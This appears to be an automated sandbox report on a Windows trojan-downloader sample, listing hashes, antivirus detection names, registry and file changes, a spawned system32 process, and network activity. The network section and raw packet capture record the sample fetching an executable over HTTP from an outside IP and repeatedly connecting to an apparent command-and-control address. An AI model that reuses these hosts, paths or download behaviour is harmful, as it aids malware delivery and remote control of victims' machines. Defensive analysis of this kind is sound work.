Analysis Date2015-11-13 22:26:08
MD589d5293293970727d6445f604d899aa5
SHA17ec17f1281818c705183b26d0c220959368d050f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 747702b1c47291c58c36409acb147418 sha1: 287e6ebfe7ad455c7434dc2ff542bb3c6f8fc192 size: 16384
Section.rdata md5: 8058945559eece3fed6be608c5c4c97a sha1: 98168edd56088d519ffbf8ca2ff45404ee5f3e00 size: 4096
Section.data md5: 3f1e834be196e18211acbf67ae9bf362 sha1: e968b523398c8c1dc02d02371dff2ad68d28c6e4 size: 4096
SectionPEinject md5: e703eb75535d154ea6d3a32d7abc5720 sha1: b1a261e02a0cee08902e833ae3305ec967d13035 size: 12288
Timestamp1970-01-01 08:30:06
PackerPE Diminisher V0.1 -> Teraphy
PEhashec7b416f32ee73bd9fd62ab91201e5abc1fb799b
IMPhash87bed5a7cba00c7e1f4015f1bdae2183
AVRisingError Scanning File
AVMcafeeno_virus
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVTwisterBackdoor.0010@1F0050/C38.mg
AVAd-AwareGeneric.ServStart.A9AC5463
AVAlwil (avast)GenMalicious-NEL [Trj]
AVEset (nod32)Win32/TrojanDownloader.PESticker.A
AVGrisoft (avg)Win32/DH{I05X?}
AVSymantecDownloader
AVFortinetW32/Injepe.A!tr.dldr
AVBitDefenderGeneric.ServStart.A9AC5463
AVK7Trojan-Downloader ( 00489a801 )
AVMicrosoft Security EssentialsBackdoor:Win32/Farfli.BY
AVMicroWorld (escan)Generic.ServStart.A9AC5463
AVMalwareBytesTrojan.Clicker.ED
AVAuthentiumW32/Agent.SP.gen!Eldorado
AVFrisk (f-prot)W32/Agent.SP.gen!Eldorado
AVIkarusTrojan.Win32.Vehidis
AVEmsisoftGeneric.ServStart.A9AC5463
AVZillya!no_virus
AVKasperskyTrojan-Downloader.Win32.Injepe.a
AVTrend MicroWORM_NITOL.SMB0
AVCAT (quickheal)Downloader.Injepe.08688
AVVirusBlokAda (vba32)BScope.Trojan.Agent
AVPadvishno_virus
AVBullGuardGeneric.ServStart.A9AC5463
AVArcabit (arcavir)Generic.ServStart.A9AC5463
AVClamAVWin.Trojan.Agent-738172
AVDr. WebTrojan.DownLoader11.13956
AVF-SecureGeneric.ServStart.A9AC5463
AVCA (E-Trust Ino)no_virus
AVRisingError Scanning File
AVMcafeeno_virus
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVTwisterBackdoor.0010@1F0050/C38.mg
AVAd-AwareGeneric.ServStart.A9AC5463
AVAlwil (avast)GenMalicious-NEL [Trj]
AVEset (nod32)Win32/TrojanDownloader.PESticker.A
AVGrisoft (avg)Win32/DH{I05X?}
AVSymantecDownloader
AVFortinetW32/Injepe.A!tr.dldr
AVBitDefenderGeneric.ServStart.A9AC5463
AVK7Trojan-Downloader ( 00489a801 )
AVMicrosoft Security EssentialsBackdoor:Win32/Farfli.BY
AVMicroWorld (escan)Generic.ServStart.A9AC5463
AVMalwareBytesTrojan.Clicker.ED
AVAuthentiumW32/Agent.SP.gen!Eldorado
AVFrisk (f-prot)W32/Agent.SP.gen!Eldorado
AVIkarusTrojan.Win32.Vehidis

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Processc:\windows\system32\thundet.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS222.186.31.228

Process
↳ c:\windows\system32\thundet.exe

Network Details:

DNSshenhaozhe.com
Type: A
8.8.8.8
DNSshenjianqiang.com
Type: A
HTTP GEThttp://222.186.31.228:7711/ftps.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 222.186.31.228:7711
Flows TCP192.168.1.1:1033 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1034 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1035 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1036 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1037 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1038 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1039 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1040 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1041 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1042 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1043 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1044 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1045 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1046 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1047 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1048 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1049 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1050 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1051 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1052 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1053 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1054 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1055 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1056 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1057 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1058 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1059 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1060 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1062 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1064 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1066 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1068 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1070 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1072 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1074 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1076 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1078 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1080 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1082 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1084 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1086 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1088 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1090 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1092 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1094 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1096 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1098 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1100 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1102 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1104 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1106 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1108 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1110 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1113 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1115 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1117 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1119 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1121 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1123 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1125 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1127 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1129 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1131 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1133 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1135 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1137 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1139 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1141 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1143 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1145 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1147 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1149 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1151 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1153 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1155 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1157 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1159 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1161 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1163 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1165 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1167 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1169 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1171 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1173 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1175 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1177 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1179 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1181 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1183 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1185 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1187 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1189 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1191 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1193 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1195 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1197 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1199 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1201 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1203 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1205 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1207 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1209 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1211 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1213 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1215 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1217 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1219 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1221 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1223 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1225 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1227 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1229 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1231 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1233 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1235 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1237 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1239 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1241 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1243 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1245 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1247 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1249 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1251 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1253 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1255 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1257 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1259 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1261 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1263 ➝ 45.35.20.204:1999
Flows TCP192.168.1.1:1265 ➝ 45.35.20.204:1999

Raw Pcap
0x00000000 (00000)   47455420 2f667470 732e6578 65204854   GET /ftps.exe HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000030 (00048)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000040 (00064)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000060 (00096)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000070 (00112)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000080 (00128)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000090 (00144)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000a0 (00160)   73743a20 3232322e 3138362e 33312e32   st: 222.186.31.2
0x000000b0 (00176)   32383a37 3731310d 0a436f6e 6e656374   28:7711..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   888808                                ...

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   888808                                ...

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   888808                                ...

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   888808                                ...

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.

0x00000000 (00000)   555509                                UU.


Strings